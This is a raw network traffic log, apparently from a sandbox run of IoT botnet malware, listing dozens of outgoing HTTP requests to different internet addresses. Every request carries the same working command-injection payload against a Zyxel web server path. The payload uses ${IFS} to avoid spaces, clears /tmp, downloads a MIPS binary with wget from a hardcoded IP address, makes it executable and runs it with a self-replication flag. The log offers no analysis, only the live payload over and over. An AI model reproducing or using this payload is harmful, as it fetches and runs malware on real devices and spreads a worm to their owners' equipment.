                                    Jan 13, 2024 19:01:54.677557945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    322192.168.2.1335790213.201.34.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:54.677589893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    323192.168.2.136060823.162.185.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:54.677668095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    324192.168.2.1344978187.98.31.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:54.677691936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    325192.168.2.135671460.36.73.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:54.677738905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    326192.168.2.1344116188.136.221.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:54.677803040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    327192.168.2.1336854151.60.130.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681458950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    328192.168.2.133384084.232.153.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681497097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    329192.168.2.134173035.7.198.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681534052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    330192.168.2.1349508220.45.77.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681576014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    331192.168.2.134063096.175.110.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681617022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    332192.168.2.133419672.236.182.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681713104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    333192.168.2.1339912212.107.40.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681713104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    334192.168.2.135193488.16.157.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681713104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    335192.168.2.1340764155.20.68.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681751966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    336192.168.2.134675492.217.17.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681756973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    337192.168.2.135025224.106.10.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681781054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    338192.168.2.1349288186.212.60.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681927919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    339192.168.2.1352170165.20.135.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:55.681962967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    340192.168.2.135747478.187.62.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685470104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    341192.168.2.1357662165.36.38.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685480118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    342192.168.2.135795467.166.197.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685517073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    343192.168.2.1357640118.61.97.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685621023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    344192.168.2.1355926219.197.189.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685648918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    345192.168.2.1351888145.245.5.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685677052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    346192.168.2.1356176180.114.36.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685729027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    347192.168.2.136065639.188.207.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685744047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    348192.168.2.1351662154.57.210.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685738087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    349192.168.2.1342600223.182.76.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685779095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    350192.168.2.1333292132.1.147.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685836077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    351192.168.2.1339358139.47.87.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685836077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    352192.168.2.1346386120.244.5.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685869932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    353192.168.2.134949449.192.63.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685929060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    354192.168.2.133636831.147.187.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.685986996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    355192.168.2.135245024.207.4.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686002016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    356192.168.2.1355508217.194.252.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686021090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    357192.168.2.1357690119.31.91.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686054945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    358192.168.2.1340488132.33.98.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686115026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    359192.168.2.134158465.157.93.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686151028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    360192.168.2.135711460.46.50.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686182022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    361192.168.2.135217239.70.133.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686209917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    362192.168.2.13460541.182.140.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686239958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    363192.168.2.135381683.66.77.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686275005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    364192.168.2.135930285.177.37.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686306953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    365192.168.2.134927073.246.91.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686639071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    366192.168.2.1355766211.80.194.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686665058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    367192.168.2.1359788179.139.208.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686788082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    368192.168.2.134326251.214.105.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686789036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    369192.168.2.1333874200.106.75.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686789036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    370192.168.2.135484897.12.15.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686846018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    371192.168.2.134320249.66.133.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686860085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    372192.168.2.1339716129.154.79.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686894894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    373192.168.2.1359054136.171.12.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.686966896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    374192.168.2.1341680150.95.224.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:56.687021017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    375192.168.2.135093619.56.204.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:57.690372944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    376192.168.2.1336192188.232.72.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:57.690396070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    377192.168.2.136063868.48.82.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:57.690424919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    378192.168.2.1349208175.34.84.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:57.690440893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    379192.168.2.1339938177.177.48.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:57.690471888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    380192.168.2.1345562122.25.36.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:57.690547943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    381192.168.2.135477689.184.144.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:57.690555096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    382192.168.2.1344184199.159.53.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:57.690648079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    383192.168.2.1346646223.7.60.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:57.690675020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    384192.168.2.133999013.81.22.218443
                                    TimestampBytes transferredDirectionData
